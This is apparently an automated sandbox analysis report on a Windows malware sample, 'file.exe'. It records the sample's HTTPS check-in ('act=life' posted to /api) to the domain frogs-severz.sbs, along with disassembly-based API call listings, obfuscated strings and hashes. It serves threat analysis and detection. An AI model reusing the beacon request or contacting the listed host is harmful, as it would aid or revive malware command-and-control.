                            Nov 25, 2024 12:58:18.416856050 CET | 1.1.1.1 | 192.168.2.7 | 0xa441 | No error (0) | frogs-severz.sbs | | 172.67.155.47 | A (IP address) | IN (0x0001) | false
                            • frogs-severz.sbs
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.7 | 49706 | 104.21.88.250 | 443 | 7616 | C:\Users\user\Desktop\file.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-11-25 11:58:19 UTC | 263 | OUT | POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: frogs-severz.sbs
                            2024-11-25 11:58:19 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                            Data Ascii: act=life
                            2024-11-25 11:58:20 UTC | 1012 | IN | HTTP/1.1 200 OK
                            Date: Mon, 25 Nov 2024 11:58:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=3alqk6vdvn44ubrfkoe8pu7nhu; expires=Fri, 21-Mar-2025 05:44:59 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=txefG9O6JwC44UFVELjBd7dY6S%2FXF2I%2F03RWy5T%2B2YtW74h4hsZ0lK%2BgFsNtM9xCwK7WNuMfzSVum4WoNKEIKGCBBIcVFF8WOOjjaxMn29e9gX6ZMao68iEqxvXWl%2FUBty%2BO"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8e81775f395e422b-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1937&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=613058&cwnd=234&unsent_bytes=0&cid=dac6f95772b3612f&ts=803&x=0"
                            2024-11-25 11:58:20 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                            Data Ascii: 2ok
                            2024-11-25 11:58:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0



                            Target ID:3
                            Start time:06:58:15
                            Start date:25/11/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x980000
                            File size:1'846'784 bytes
                            MD5 hash:1959840F03733001022C3AA78866B3E0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:3.7%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:66.7%
                              Total number of Nodes:234
                              Total number of Limit Nodes:14
                              execution_graph: node and edge listing of the rendered graph (not reproduced). Entry nodes in the listing: 98e0d8, 98e970, 999130, 99db30, 98ceb3, 98d7d3, 98dc33, 98c32b, 98e88f, 9889a0, 98a2e1, 9a1960, 9bb7e0, 9bbce0, 9c02c0, 9c0a00, 98cf05. API calls reachable in the graph: LdrInitializeThunk, RtlAllocateHeap, CoInitializeSecurity, CoUninitialize, CoInitializeEx, ExitProcess, FreeLibrary, SysAllocString, CoSetProxyBlanket, GetVolumeInformationW, SysFreeString.

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph: basic blocks 9b9030-9b97f5 of the rendered graph (edge listing not reproduced). API calls in the graph: SysAllocString, CoSetProxyBlanket, GetVolumeInformationW, SysFreeString (x2). Internal calls: 9bf9a0, 9a0650, 988330, 9882b0, 9882e0, 9882c0.
                              APIs
                              • SysAllocString.OLEAUT32(13C511C2), ref: 009B91B6
                              • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009B91FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: AllocBlanketProxyString
                              • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                              • API String ID: 900851650-4011188741
                              • Opcode ID: c7f3261f390b3e2da62e98f56ef68ee02d275a0b254baaa46c7bd5b42da36364
                              • Instruction ID: f2b65b923da1ec5962d00981040be4cb4076ac789c090109a643fb0d3df4722f
                              • Opcode Fuzzy Hash: c7f3261f390b3e2da62e98f56ef68ee02d275a0b254baaa46c7bd5b42da36364
                              • Instruction Fuzzy Hash: B82253719183019BE320CF24CC81B9BBBEAEFD5364F148A1CF6959B281D774E905CB92

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph: basic blocks 98cf05-98d791 of the rendered graph (edge listing not reproduced). No direct API calls in the graph. Internal calls: 988930, 9b9030 (x2), 98b960 (x2).
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: ()$+S7U$,_"Q$0C%E$7EDB854A739D0848D7CBBD6DF28D3732$7W"i$;[*]$<KuM$N3F5$S7HI$frogs-severz.sbs$y?O1$c]e$gy
                              • API String ID: 0-1167271720
                              • Opcode ID: b29f319c8602ac95de57018fd2543965c16d93110862c330b5c60f789d0e06f4
                              • Instruction ID: 9b94dfe470c9ba3d2206475193502503394a3f0cc7bfaa599031b7b08ffc230e
                              • Opcode Fuzzy Hash: b29f319c8602ac95de57018fd2543965c16d93110862c330b5c60f789d0e06f4
                              • Instruction Fuzzy Hash: 77120CB158D3C18ED3358F25C495BEFBBE1ABD2304F18895CC4DA5B296C775090ACBA2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph: basic blocks 9889a0-988cbb of the rendered graph (edge listing not reproduced). API calls in the graph: ExitProcess. Internal calls: 9bcb70, 9b6620, 9bdeb0, 989ed0, 98ce80, 98b930.
                              APIs
                              • ExitProcess.KERNEL32(00000000), ref: 00988CB5
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: 637cd5d6320d92c08ecc888f912cba46c643b4e80e106e8489bb5c7e0f46f5cf
                              • Instruction ID: 6abc633b1fc12cc2e919186f0b24b38f39ee439bb6901f7bb338c9a86d5348ac
                              • Opcode Fuzzy Hash: 637cd5d6320d92c08ecc888f912cba46c643b4e80e106e8489bb5c7e0f46f5cf
                              • Instruction Fuzzy Hash: 30710273B547040BC708DEBAD89235BFAD6ABC8714F09D83DA888D7390EAB89C054795

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 234 9bdf70-9bdfa2 LdrInitializeThunk
                              APIs
                              • LdrInitializeThunk.NTDLL(009BBA46,?,00000010,00000005,00000000,?,00000000,?,?,00999158,?,?,009919B4), ref: 009BDF9E
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0

                               Control-flow Graph: 229 9bb7e0-9bb7ff, 230 9bb800-9bb83d, 231 9bb83f-9bb85b RtlAllocateHeap (edges: 229->230, 230->230, 230->231)
                              APIs
                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 009BB84E
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0

                               Control-flow Graph: 232 98ce80-98ceb0 CoInitializeEx
                              APIs
                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0098CE93
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: Initialize
                              • String ID:
                              • API String ID: 2538663250-0

                               Control-flow Graph: 233 98ceb3-98cee2 CoInitializeSecurity
                              APIs
                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0098CEC6
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: InitializeSecurity
                              • String ID:
                              • API String ID: 640775948-0

                               Control-flow Graph: 265 98d7d3-98d7d8 CoUninitialize, 266 98d7da-98d7e1 (edge: 265->266)
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: Uninitialize
                              • String ID:
                              • API String ID: 3861434553-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                              • API String ID: 1279760036-1524723224
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                              • API String ID: 0-1787199350
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: vvS$*D@~$/M_g$6#o_$CG]$L,_N$Qy($qe_ $[W{
                              • API String ID: 0-460923326
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 7EDB854A739D0848D7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
                              • API String ID: 0-2802868897
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: q~$"~}$%st_$25!=$mjpO$qw
                              • API String ID: 0-4121076296
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
                              • API String ID: 0-3274379026
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: N,w$Zx.$aN;$n??t
                              • API String ID: 0-2076266626
                              • Opcode ID: db2cf3a1d92eb6f93643c0fe9a11bbbf7d8657672af83bbf78ab4d8853aa4c41
                              • Instruction ID: 1b9844610ab63ea296748659ef8536b2db0c2d4905b8950bec082d5a02139d08
                              • Opcode Fuzzy Hash: db2cf3a1d92eb6f93643c0fe9a11bbbf7d8657672af83bbf78ab4d8853aa4c41
                              • Instruction Fuzzy Hash: 12B2F9F3A0C2109FE704AE2DEC8567AFBE9EF94720F16493DEAC4C3744E63558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: Lk$U\$Zb$frogs-severz.sbs$r
                              • API String ID: 0-2060998389
                              • Opcode ID: 7f42a1b4ac8ce2282749dc4b356f8b89f6a9fb928e6f7f4c0c82b519ec11a4e8
                              • Instruction ID: fed8e6b0be5ef01bdcf4efabd0359fb3cdf265f41d570f585f13de3241bf0464
                              • Opcode Fuzzy Hash: 7f42a1b4ac8ce2282749dc4b356f8b89f6a9fb928e6f7f4c0c82b519ec11a4e8
                              • Instruction Fuzzy Hash: AAA1BDB050C3D18AD7759F25C4A47EFBBE1AB93308F188A5CE0E94B292DB3945068B57
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: )=+4$57$7514$84*6$N
                              • API String ID: 0-4020838272
                              • Opcode ID: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                              • Instruction ID: d74990be4d0f5417834c313b2577637c89fa7b2ef15b1e2b9129e2389558207d
                              • Opcode Fuzzy Hash: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                              • Instruction Fuzzy Hash: 1E71BF6110C3D28BD315DB3984A077BBFE1AFA2305F1C49ADE4D64B392D779890AC752
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: +2/?$=79$BBSH$GZE^
                              • API String ID: 0-3392023846
                              • Opcode ID: c6b0dfb18cc32e99646134bd02f91e05acf7b189f7f09c456925d0373dc2ddb7
                              • Instruction ID: c24666d9c3d824e3c6058d12bccfe2e5bb3db2cc0174c8b971c8b1cda0b94e87
                              • Opcode Fuzzy Hash: c6b0dfb18cc32e99646134bd02f91e05acf7b189f7f09c456925d0373dc2ddb7
                              • Instruction Fuzzy Hash: C152D071504B418FC735CF39C890766BBE2BF96314F188A6DD4E68BB92C735A806CB90
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: H{D}$TgXy$_o]a$=>?
                              • API String ID: 0-2004217480
                              • Opcode ID: 890540aa20bebdfb513a7d207428087832b5475cfaaa8e27ff49d4a4ca0b5f1c
                              • Instruction ID: f40a0609560b078f46a762a2d560a71b3636d9477af00fbe9145c344512cb459
                              • Opcode Fuzzy Hash: 890540aa20bebdfb513a7d207428087832b5475cfaaa8e27ff49d4a4ca0b5f1c
                              • Instruction Fuzzy Hash: 841264B1614B01CFD3248F26D891B97BBF5FB45314F048A2DE4AA8BAA0DB74B445DF80
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: =:;8$=:;8$a{$kp
                              • API String ID: 0-2717198472
                              • Opcode ID: c3b9bc30a436973d07918f665fd6c67de7a6ac0d28fa8f34bba8e7b85f156a3a
                              • Instruction ID: e807832eb2e33150a7777ec08fad0b102f0c3e724cbe7eaa43393872ff4f7c38
                              • Opcode Fuzzy Hash: c3b9bc30a436973d07918f665fd6c67de7a6ac0d28fa8f34bba8e7b85f156a3a
                              • Instruction Fuzzy Hash: C8E1CCB595C341DFE320DF64D881B6BBBE5FBC5304F14892CE5858B2A1EB349805CB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
